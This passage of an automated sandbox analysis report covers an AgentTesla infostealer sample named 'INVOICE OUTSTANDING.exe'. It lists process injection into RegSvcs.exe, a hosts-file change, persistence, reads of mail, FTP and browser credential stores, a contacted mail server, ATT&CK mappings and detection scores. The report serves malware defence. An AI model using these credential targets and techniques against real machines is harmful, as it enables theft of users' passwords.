            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Modifies the hosts file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		211
            Process Injection            		1
            File and Directory Permissions Modification            		2
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts2
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		1
            Credentials in Registry            		114
            System Information Discovery            		Remote Desktop Protocol2
            Data from Local System            		Exfiltration Over Bluetooth1
            Non-Standard Port            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Scheduled Task/Job            		Logon Script (Windows)1
            Registry Run Keys / Startup Folder            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager311
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration1
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
            Obfuscated Files or Information            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer11
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
            Software Packing            		LSA Secrets131
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Masquerading            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items131
            Virtualization/Sandbox Evasion            		DCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job211
            Process Injection            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Hidden Files and Directories            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 680571 Sample: INVOICE OUTSTANDING.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus detection for dropped file 2->54 56 13 other signatures 2->56 7 INVOICE OUTSTANDING.exe 6 2->7         started        11 kECjS.exe 2 2->11         started        13 kECjS.exe 1 2->13         started        process3 file4 34 C:\Users\user\AppData\Roaming\ahgeNfsrA.exe, PE32 7->34 dropped 36 C:\Users\user\AppData\Local\...\tmp69D2.tmp, XML 7->36 dropped 38 C:\Users\user\...\INVOICE OUTSTANDING.exe.log, ASCII 7->38 dropped 58 Writes to foreign memory regions 7->58 60 Injects a PE file into a foreign processes 7->60 15 RegSvcs.exe 2 4 7->15         started        20 schtasks.exe 1 7->20         started        22 BackgroundTransferHost.exe 13 7->22         started        24 conhost.exe 11->24         started        26 conhost.exe 13->26         started        signatures5 process6 dnsIp7 40 mail.oceanskylogistics.in 43.255.154.57, 49763, 587 AS-26496-GO-DADDY-COM-LLCUS Singapore 15->40 30 C:\Users\user\AppData\Roaming\...\kECjS.exe, PE32 15->30 dropped 32 C:\Windows\System32\drivers\etc\hosts, ASCII 15->32 dropped 42 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->42 44 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->44 46 Tries to steal Mail credentials (via file / registry access) 15->46 48 5 other signatures 15->48 28 conhost.exe 20->28         started        file8 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            INVOICE OUTSTANDING.exe38%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            INVOICE OUTSTANDING.exe100%AviraHEUR/AGEN.1235476
            INVOICE OUTSTANDING.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe100%AviraHEUR/AGEN.1235476
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\ahgeNfsrA.exe38%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            C:\Users\user\AppData\Roaming\kECjS\kECjS.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\kECjS\kECjS.exe0%ReversingLabs

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack100%AviraHEUR/AGEN.1235476Download File
            14.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

            Domains

            SourceDetectionScannerLabelLink
            mail.oceanskylogistics.in2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.fontbureau.com.C0%Avira URL Cloudsafe
            http://www.monotype.K0%Avira URL Cloudsafe
            http://wITvjB.com0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.fontbureau.comessed0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.fontbureau.comalicCC0%Avira URL Cloudsafe
            http://www.fonts.comic0%URL Reputationsafe
            http://www.founder.com.cn/cnl0%URL Reputationsafe
            http://www.fontbureau.comaCC0%Avira URL Cloudsafe
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
            http://www.fonts.comn0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.founder.com.cn/cnl-s0%URL Reputationsafe
            http://www.urwpp.de0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            https://Vvf6edm0NHgn8Mct.com0%Avira URL Cloudsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.comueed0%URL Reputationsafe
            http://www.fontbureau.comalsd0%URL Reputationsafe
            http://www.founder.com.cn/cnr-f0%URL Reputationsafe
            http://www.fontbureau.comF0%URL Reputationsafe
            http://www.fontbureau.comcom/pC0%Avira URL Cloudsafe
            http://www.agfamonotype.0%URL Reputationsafe
            http://www.fonts.comn-u0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
            http://www.founder.com.cn/cn/cr%X0%Avira URL Cloudsafe
            http://www.tiro.comlic0%URL Reputationsafe
            http://www.sandoll.co.kre0%URL Reputationsafe
            http://www.fontbureau.coma0%URL Reputationsafe
            http://www.fontbureau.come.com0%URL Reputationsafe
            http://www.microft.c0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.sajatypeworks.comdif0%Avira URL Cloudsafe
            http://mail.oceanskylogistics.in0%Avira URL Cloudsafe
            http://www.carterandcone.comand0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mail.oceanskylogistics.in
            		43.255.154.57
            		truetrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://127.0.0.1:HTTP/1.1RegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		low
            http://www.fontbureau.com/designersGINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.fontbureau.com/designers/?INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.founder.com.cn/cn/bTheINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers?INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.com.CINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.monotype.KINVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://wITvjB.comRegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tiro.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258983594.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258921299.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.fontbureau.comessedINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.goodfont.co.krINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
